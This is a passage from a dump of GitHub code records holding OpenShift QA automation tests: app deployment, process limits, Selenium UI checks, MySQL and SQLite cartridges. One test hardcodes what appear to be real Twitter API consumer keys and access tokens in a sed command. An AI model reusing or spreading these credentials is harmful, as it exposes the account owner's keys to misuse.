`tweetstream` from [kitchensinkHtml5, tweetstream,kitchensink]\")\n self.test_variant = 'tweetstream'\n\n self.app_name = self.test_variant\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass JbossSampleApplications(OpenShiftTest):\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\n \"1. Create an jbossas app for %s test\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n # 2.Git remote add and pull\n testname_to_giturl = { \n \"kitchensinkHtml5\" : \"git://github.com/openshift/kitchensink-html5-mobile-example.git\",\n \"tweetstream\" : \"git://github.com/openshift/tweetstream-example.git\",\n \"kitchensink\" : \"git://github.com/openshift/kitchensink-example.git\"}\n\n git_url = testname_to_giturl[self.test_variant]\n self.steps_list.append( testcase.TestCaseStep(\"2.Git remote add and pull\",\n \"cd %s && git remote add upstream -m master %s && git pull -s recursive -X theirs upstream master\" % (self.git_repo, git_url),\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 3.Make some changes to the git repo\n if self.test_variant == \"kitchensinkHtml5\":\n cmd = \"touch %s/testemptyfile\" % (self.git_repo)\n elif self.test_variant == \"tweetstream\":\n cmd = \"cd %s/tweetstream/src/main/resources/ && sed -i -e 's/consumerKey=/consumerKey=HdPuX8kwhFQtcHesyMlDcQ/' twitter4j.properties && sed -i -e 's/consumerSecret=/consumerSecret=XsMdF9qYCPlQOMxwoAgBJtEumW2DSGtBkABfxj21I/' twitter4j.properties && sed -i -e 's/accessToken=/accessToken=356040597-o6ev08uMGXFuGBlNahwxYwE9IaOBJnoaneUbP7Y/' twitter4j.properties && sed -i -e 's/accessTokenSecret=/accessTokenSecret=x9c1KUQUUp4JZ7cV5X91jfPEqRhFOHhyLGOtIzSFq5A/' twitter4j.properties\" % (self.git_repo)\n elif self.test_variant == \"kitchensink\":\n cmd = \"cd %s && echo \\\"HelloKitchensink\\\">>testfile.txt\" % (self.git_repo)\n else:\n raise Exception(\"Invalid self.test_variant\")\n\n self.steps_list.append( testcase.TestCaseStep(\"3.Make some changes to the git repo\",\n cmd,\n expect_description=\"Made changes successfully\",\n expect_return=0))\n\n # 4.Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"2.Git push all the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 5.Check the app via browser\n def get_app_url(app_name, suffix):\n def get_app_url2():\n\n return OSConf.get_app_url(app_name)+suffix\n return get_app_url2\n\n suffix = \"\"\n if self.test_variant == \"kitchensinkHtml5\":\n test_html = \"HTML5 form element & validation\"\n elif self.test_variant == \"tweetstream\":\n test_html = \"Top Tweeters\"\n suffix = \"/pages/home.jsf\"\n elif self.test_variant == \"kitchensink\":\n test_html = \"member\"\n suffix += \"/rest/members\"\n self.steps_list.append( testcase.TestCaseStep(\"5.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name, suffix), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossSampleApplications)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5793335437774658, "alphanum_fraction": 0.5851421356201172, "avg_line_length": 30.152381896972656, "blob_id": "1b5d56d7f4fb5c711956e37977d6b76b4bf1598c", "content_id": "41c94b003a145da0e981dd5df9e3152a99241cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3271, "license_type": "no_license", "max_line_length": 167, "num_lines": 105, "path": "/automation/open/testmodules/RT/limits/nproc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\ntests_dir = sys.path.append([testdir,\"/tests/\"])\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.max_procs = 250\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass Nproc(OpenShiftTest):\n def check_nproc(self, number):\n print \"The max count of procs is: %s\" % number\n if int(number) < self.max_procs:\n return 0\n return \n\n def test_method(self):\n step = testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n tests_dir=os.path.join(testdir, \"testmodules/RT/\")\n \n step = testcase.TestCaseStep(\n \"prepare template file\",\n \"cp -r %s/limits/app_template/* %s/php && sed -i -e 's/count.*\\\"/count %d\\\"/' %s/php/nproc.php\"% (tests_dir, self.app_name, self.max_procs, self.app_name),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"get app URL\",\n common.get_app_url_from_user_info,\n function_parameters = [self.app_name])\n self.steps_list.append(step)\n\n #5\n step = testcase.TestCaseStep(\n \"check feedback\",\n \"curl --fail --silent --max-time 300 -H 'Pragma: no-cache' __OUTPUT__[4]/nproc.php | grep max: | awk -F' ' '{ print $8 }'\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #6\n step = testcase.TestCaseStep(\n \"check the number of processes\",\n self.check_nproc,\n function_parameters = ['__OUTPUT__[5]'],\n expect_return = 0)\n step.add_clean_up(common.destroy_app, [self.app_name])\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-limits] numuber of processes limit\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Nproc)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5881595611572266, "alphanum_fraction": 0.6132560968399048, "avg_line_length": 22.89230728149414, "blob_id": "a8693413cd48e64876205c546bc4fbec2d7a02fc", "content_id": "3a1f1aa555fe8dc88727c1d003b61c2dc08f6789", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1554, "license_type": "no_license", "max_line_length": 159, "num_lines": 65, "path": "/automation/open/testmodules/UI/web/case_138602.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138602.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Add_Invalid_Sshkey_Name(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Add SSHKey with invalid name\n web.go_to_account_page()\n time.sleep(10)\n web.go_to_account_page()\n web.input_by_id(\"key_raw_content\", \"ffffffff\")\n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n \n web.input_by_id(\"key_name\", \"####\")\n web.clear_element_value(\"key_raw_content\")\n web.input_by_id(\"key_raw_content\", \"ssh-rsa aaaa\") \n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''Invalid key name. Name must only contain alphanumeric characters.''', '''//div[@id='key_name_input']/div/p''') \n\n self.tearDown()\n\n return self.passed(\"Case 138602 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Add_Invalid_Sshkey_Name)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_138602.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7519999742507935, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 30.25, "blob_id": "527b48e45dff2c26ec13815da9dfae798aaa668a", "content_id": "93adb56513242a2626a51399e26965ea7b3cac07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 125, "license_type": "no_license", "max_line_length": 72, "num_lines": 4, "path": "/automation/open/Longevity/app_operation_test.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\napp_operations=\"status start restart reload stop force-stop tidy delete\"\nrun app_oper_testing $1\n" }, { "alpha_fraction": 0.5938228368759155, "alphanum_fraction": 0.6247086524963379, "avg_line_length": 23.154930114746094, "blob_id": "35ee47d0f926140279db27eaf90a536002dd06b7", "content_id": "55ac8ba07af33bcbf5916a8ce8b4bed4614dfa38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1716, "license_type": "no_license", "max_line_length": 135, "num_lines": 71, "path": "/automation/open/testmodules/UI/web/case_174360.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174360.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithoutSSHKey(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n #web.delete_app(\"ruby19\")\n #create a ruby1.9 app\n web.create_app(\"ruby-1.9\",\"ruby19\")\n\n #check wether the links are correct\n time.sleep(5)\n \n #check the sshkey part\n web.assert_text_equal_by_xpath(\"Set your Public Key\",'''//div[@id='content']/div/div/div/div[2]/div/section[2]/div/div/h4''') \n \n #delete a python app\n web.go_to_app_detail(\"ruby19\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.go_to_app_detail(\"ruby19\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_174360--CreateAppWithoutSSHKey passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithoutSSHKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174360.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5703051090240479, "alphanum_fraction": 0.5769109725952148, "avg_line_length": 41.9594612121582, "blob_id": "62aa5a9900f06d9d87409d7834ea9b68518bd955", "content_id": "c55499ccdebfc289ce1a5b732febbb961d46b443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 219, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/python-3.3/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\nimport pymongo3\n\nvirtenv = os.environ['OPENSHIFT_HOME_DIR'] + 'python-3.3/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python3.3/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n #con = pymongo.Connection('mongodb://#user:#passwd@#host:#port')\n #db = con['#dbname']\n con = pymongo.Connection(os.environ['OPENSHIFT_MONGODB_DB_URL'])\n db = con[os.envrion['OPENSHIFT_APP_NAME']]\n\n coll = db['info']\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/insert':\n if 'size' in parameters:\n size = int(escape(parameters['size'][0]))\n else:\n size = 500000\n for i in range(size):\n doc = {\"data\" : \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"}\n coll.insert(doc)\n response_body = '''Gear DNS: %s\n%s records have been inserted into mongodb\\n''' % (os.environ['OPENSHIFT_GEAR_DNS'], size)\n elif environ['PATH_INFO'] == '/delete':\n coll.remove()\n response_body = 'Gear DNS: %s\\nAll the records have been deleted from mongodb database\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n elif environ['PATH_INFO'] == '/show':\n response_body = 'Gear DNS: %s\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n count = coll.count()\n if count <= 0:\n response_body += 'There is no record in database\\n'\n else:\n doc = coll.find_one()\n response_body += \"There are %d records in database\\nHere's one record: %s\" % (count, str(doc['data']))\n else:\n ctype = 'text/plain'\n response_body = 'Welcome to OpenShift'\n\n con.close()\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.6655779480934143, "alphanum_fraction": 0.6678500175476074, "avg_line_length": 54.015625, "blob_id": "e0d35f40cfef822a05c3ae8024f35daae861ef3b", "content_id": "dd2e7346e234bd97676f2d34ef590685720809cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7042, "license_type": "no_license", "max_line_length": 155, "num_lines": 128, "path": "/automation/open/testmodules/UI/web/tc_platformoverview.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\n\nclass PlatformOverview(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.binary= \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n\n def test_check_platform_a_overview_never_signin(self):\n baseutils.go_to_platformoverview(self)\n self.driver.delete_cookie(\"_rhc_session\")\n self.driver.delete_cookie(\"rh_sso\")\n self.driver.delete_cookie(\"prev_login\")\n self.driver.refresh()\n# baseutils.click_element_by_link_text(self,\"EXPRESS\")\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='express']/h2/a\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath_no_wait(self,\"//*[@id='flex']/header/h2/a\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Flex\")\n baseutils.go_back(self)\n# baseutils.click_element_by_xpath_no_wait(self,\"//*[@id='power']/header/h2/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Power\")\n# baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.click_element_by_xpath(self,\"//li[@id='express']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Platform Features\")\n# baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.click_element_by_xpath(self,\"//li[@id='flex']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Platform Features\")\n# baseutils.go_back(self)\n# baseutils.scroll_to_upper(self)\n# baseutils.assert_contain_text_by_xpath(self,\"//div[@id='user_box']/div/h2\",\"Don't have an OpenShift account\")\n baseutils.click_element_by_link_text(self,\"Create account\")\n baseutils.assert_element_present_by_id(self,\"web_user_email_address\")\n baseutils.click_element_by_css(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_link_text(self,\"...or sign in\")\n baseutils.assert_element_present_by_id(self,\"login_input\")\n baseutils.click_element_by_css(self,\"a.close_button > img\")\n baseutils.assert_text_equal_by_css(self,\"POPULAR OPENSHIFT VIDEOS\",\"#videos > header > h1\")\n baseutils.click_element_by_link_text(self,\"Watch more videos\")\n baseutils.check_title(self,\"Videos | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='retweets']/ul/li[*]/a/img\")\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='retweets']/ul/li[*]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//*[@id='buzz']/a\")\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//*[@id='buzz']/a\")\n time.sleep(5)\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n\n def test_check_platform_b_overview_videos_links(self):\n baseutils.go_to_platformoverview(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"OpenShift Appcelerator Demo\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying Mobile Apps on OpenShift with Appcelerator\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"Mobile App Deployment to Express w/ Appcelerator\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying Mobile Apps on OpenShift with Appcelerator\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"OpenShift Flex Product Tour\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch OpenShift Flex Product Tour\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"OpenShift Flex Product Tour\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch OpenShift Flex Product Tour\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_css(self,\"img[alt=\\\"Deploying to OpenShift PaaS with the eXo Cloud IDE\\\"]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying to OpenShift PaaS with the eXo cloud IDE\")\n baseutils.go_back(self)\n baseutils.scroll_to_upper(self)\n baseutils.click_element_by_link_text(self,\"Deploying to OpenShift PaaS with the eXo Cloud IDE\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Watch Deploying to OpenShift PaaS with the eXo cloud IDE\")\n\n def test_check_platform_c_overview_signed_in_out(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n time.sleep(20)\n baseutils.go_to_platformoverview(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//li[@id='express']/div/a\")\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\",\"Control Panel is not equal here\")\n baseutils.go_back(self)\n# baseutils.scroll_bar(self)\n# baseutils.assert_contain_text_by_css(self,\"Open\",\"#flex > div.content > a.more\")\n baseutils.logout(self)\n baseutils.click_element_by_link_text(self,\"Platform Overview\")\n baseutils.scroll_to_upper(self)\n# baseutils.assert_contain_text_by_css(self,\"Compare features\",\"a.more\")\n# baseutils.assert_contain_text_by_xpath(self,\"Compare features\",\"//li[@id='flex']/div/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Sign in to OpenShift\",\".//*[@id='user_box']/div/h2\")\n baseutils.click_element_by_link_text(self,\"Click here to reset your password\")\n# while (not baseutils.assert_element_present_by_css(self,\"#reset_password > header > h1\")):\n# baseutils.click_element_by_link_text(self,\"Click here to reset your password\")\n# baseutils.assert_text_equal_by_css(self,\"Reset your password\",\"#reset_password > header > h1\",\"Reset your password is not equal to the text here\")\n# baseutils.click_element_by_xpath(self,\"//div[@id='reset_password']/a/img\")\n baseutils.click_element_by_link_text(self,\"Click here to register\")\n time.sleep(4)\n baseutils.assert_element_present_by_id(self,\"web_user_email_address\")\n# baseutils.click_element_by_css(self,\"#signup > a.close_button > img\")\n \n\n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5750662088394165, "alphanum_fraction": 0.5799551606178284, "avg_line_length": 36.181819915771484, "blob_id": "302b4e1024a00fd8b42ce96f3ec99a356cdb367d", "content_id": "2a0d275fbb321bce489a9b219ce00ac35b924df8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4909, "license_type": "no_license", "max_line_length": 170, "num_lines": 132, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_jboss.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 04, 2012\n[rhc-cartridge] embed MySQL instance to JBossAS application\nhttps://tcms.engineering.redhat.com/case/???/\n\"\"\"\nimport os\n\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an JBossAS application\"\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jboss4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass EmbedMysqlToJboss(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a JBoss app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description = \"the app should be created successfully\",\n expect_return=0)\n \n self.add_step(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \n \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0)\n\n def config_app(app_name):\n cmd = \"\"\"cd %s && sed -i '/MysqlDS\"/ {s/false/true/}' .openshift/config/standalone.xml; git commit -a -m 'changes' && git push\"\"\"%self.app_name\n (status, output) = common.command_getstatusoutput(cmd)\n return 0\n\n self.add_step(\"Modify JBoss \", \n config_app,\n function_parameters = [self.app_name],\n expect_description = \"The config file should be modified successfully\",\n expect_return = 0)\n\n def add_page(app_name):\n new_page = \"\"\"<%@ page contentType=\"text/html\" language=\"java\" import=\"java.sql.*\" %>\n<%@ page import=\"javax.naming.*\" %>\n<%@ page import=\"javax.sql.*\" %>\n<%\nInitialContext ctx = new InitialContext();\nDataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\nConnection connection=ds.getConnection();\nStatement statement = connection.createStatement();\nstatement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\nstatement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\nstatement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\");\nResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\nResultSetMetaData rmeta = rs.getMetaData();\nint numColumns=rmeta.getColumnCount();\nwhile(rs.next()) {\nout.print(rs.getString(1));\nout.print(\", \");\nout.print(rs.getString(2));\nout.print(\"<br>\");\n}\nout.print(\"<br>\");\nrs.close();\nstatement.close();\nconnection.close();\n%>\"\"\"\n new_filename = \"src/main/webapp/mysql.jsp\"\n f = open(\"%s/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add %s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.add_step(\"Create a page which does some operation with \"\n \"mysql database under ./src/main/webapp , like mysql.jsp:\",\n add_page,\n function_parameters = [self.app_name],\n expect_description = \"The page should be added without errros\",\n expect_return = 0)\n\n def verify(app_name):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql.jsp\", \n 'Jeremy', \n \"-H 'Pragma: no-cache' -L\", 5, 6)\n \n\n self.add_step(\"Verify the MySQL functionality...\",\n verify,\n function_parameters = [self.app_name],\n expect_description = \"The page should be added without errros\",\n expect_return = 0)\n\n self.add_step(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters = [self.app_name, \n \"remove-\" + common.cartridge_types['mysql']],\n expect_description = \"the mysql should be removed successfully\",\n expect_return = 0)\n\n self.run_steps()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToJboss)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5924646854400635, "alphanum_fraction": 0.6031396985054016, "avg_line_length": 33.989009857177734, "blob_id": "8511fd15fa1b5b8b8382e6764838e63fcd77dda5", "content_id": "3450464b18db5f61bfca8b9d16353ca3da04b74a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3185, "license_type": "no_license", "max_line_length": 167, "num_lines": 91, "path": "/automation/open/testmodules/RT/cartridge/php_sqlite_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]PHP sqlite Support\nhttps://tcms.engineering.redhat.com/case/122284/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase,common,OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]PHP sqlite Support\"\n self.app_name = \"phpsqlite\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = \"./%s\" % (self.app_name)\n tcms_testcase_id=122284\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass PhpSqliteSupport(OpenShiftTest):\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an php app: %s\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Make some change to the git repo\n cmd = \"cd %s/php && mkdir db && touch db/test && rm -f index.php\" % (self.git_repo)\n self.steps_list.append(testcase.TestCaseStep(\"2.Make some change to the git repo\",\n cmd,\n expect_description=\"Successfully touched test and removed index.php\",\n expect_return=0))\n\n # 3.Copy app template to the git repo and git push\n cmd = \"cp %s/app_template/php-sqlite.template %s/php/index.php && cd %s && git add . && git commit -am t && git push\" %(WORK_DIR, self.git_repo, self.git_repo)\n self.steps_list.append(testcase.TestCaseStep(\"3.Copy app template to the git repo and git push\",\n cmd,\n expect_description=\"Copy and git push succeed\",\n expect_return=0))\n\n # 4.Check app via browser\n test_html = \"done\"\n self.steps_list.append(testcase.TestCaseStep(\"4.Check the app via browser\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), \n test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed()\n if case.testcase_status == 'FAILED':\n return self.failed()\n if case.testcase_status == 'ERROR':\n return self.incomplete()\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PhpSqliteSupport)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 